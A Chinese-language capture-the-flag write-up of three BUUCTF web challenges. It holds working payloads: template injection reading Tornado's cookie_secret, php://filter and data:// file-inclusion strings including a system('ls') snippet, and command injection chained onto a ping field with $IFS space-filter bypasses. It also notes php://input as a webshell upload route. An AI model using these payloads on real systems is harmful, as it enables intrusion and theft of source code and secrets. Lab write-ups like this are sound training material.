buuctf

前言easy_tornadoinclude补充file://协议php://协议php://filter协议php://input协议 zip://协议compress.bzip2://compress.zlib://data:// PING PING PING

前言

经过几周的联系，感觉自己可以接触buuctf上面的题了，就去尝试了一下，结果可真的是让我涨了好多见识啊！ 卑微.jpg

easy_tornado

刚打开题目环境，发现了三个文件 依次打开发现

接着发现url框里的get内容http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/file?filename=/hints.txt&filehash=0dd45678a8a1205a0110d2450a842825 然后这里就有了一点点头绪。就是flag在/fllllllllllllag这个目录下，然后还要进行md5加密，所以构造payload为：

http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=加密后的内容

然后现在问题就是cookie_secret这个是什么。由于第一次遇见，所以就来请问师傅百度了。（顺便百度了一下render函数是什么）发现： render是python的一个模板，他们的url都是由filename和filehash组成，filehash即为他们filename的md5值。 又加上题目提示tornado，所以就搜索到了cookie_secret存放在handler.settings中。 然后还意外地看到了大佬们的wp，说是ssti模板注入。然后验证是否为模板注入。 第一次构造payloadfile?filename=/fllllllllllllag提示error。并且url框出现 然后尝试http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/error?msg={{1}}发现页面出现 接着尝试http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/error?msg={{1*8}}页面提示 说明存在模板注入。 接着就构造payload获得cookie_secret的值http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/error?msg={{handler.settings}} 得到 然后进行最后的md5加密用了PHP代码

<?php $cookie_secret='b2b852cd-7505-4918-82d8-8ceab6e24cc9'; $filename='/fllllllllllllag'; $eco=md5($cookie_secret.md5($filename)); echo $eco; ?>

得到了最终的filehash值 所以构造最终payload：http://db2df9d1-b1b7-4b96-aa02-7585d17c0921.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=16e766d7895b3c30ee8f3bafaa43d271 得到flag

include

打开题目 点开之后提示 然后就开始find flag。刚开始没看题目，就一股脑做了，用了各种方法，抓包，f12，注入等等，发现始终只有一个样式。 然后就知道了看题目的重要性。发现了题目名称是include。于是想到了文件包含和php伪协议。 所以就构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php 得到base64编码后的字符 然后base64解码得到flag

补充

php伪协议

常见的文件包含函数：include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data://

file://协议

file:// 用于访问本地文件系统，在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

使用方法：

file://文件绝对路径和文件名

php://协议

php:// 访问各个输入/输出流（I/O streams），在CTF中经常使用的是php://filter和php://input，php://filter用于读取源码，php://input用于执行php代码。

php://filter协议

php://filter 读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了。

使用方法

?file=php://filter/read=convert.base64-encode/resource=

php://input协议

这个是平时做题用的比较多的。一般用来传一句话木马。不过注意是在POST方式传代码。

zip://协议

使用方法：

zip://archive.zip#dir/file.txt

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

compress.bzip2://

使用方法：

compress.bzip2://file.bz2

compress.zlib://

使用方法：

compress.zlib://file.gz

data://

data协议也是平时做题经常遇见的。 常用形式：?file=data://text/plain;base-64,<?php system('ls');?>

PING PING PING

打开题目，发现了 题目提示ping，然后页面有一个?ip=，所以应该是在搜索框里用get方式进行ping。 所以尝试：?ip=127.0.0.1 ping通了，说明思路没错，然后就查看了一下当前目录下的文件?ip=127.0.0.1|ls 发现有一个flag.php的文件，说明最后答案就在里面。然后就?ip=127.0.0.1|cat index.php （因为出现了两个文件，防止有什么绕过在这个文件里，就先查看了一下） 发现 说明在命令行里有什么被过滤了，接着就猜测应该是存在了空格过滤，就尝试了一下 发现的确是空格过滤，于是就百度了一下常见的空格过滤绕过方式

< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS

发现是这几个。然后在这个题目里一个一个试，发现是$IFS$，所以尝试?ip=127.0.0.1|cat$IFS$1index.php

/?ip= /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else if(preg_match("/bash/", $ip)){//过滤了bash die("fxck your bash!"); } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){//过滤了flag的正则匹配 die("fxck your flag!"); } $a = shell_exec("ping -c 4 ".$ip); echo " "; print_r($a); } ?>

元字符.：表示匹配除了换行符\n以外的任意字符 元字符*:表示多次匹配*前面的内容 .*连在一下，表示匹配任意次的不包含换行符的字符

然后利用黑名单拼接， 构造最终payload： ?ip=127.0.0.1;a=ag;cat$IFS$1fl$a.php 发现正常 然后F12，在控制窗口找到flag flag=flag{ad04b7ca-ebe6-43dd-a5e2-f8aac85c784c}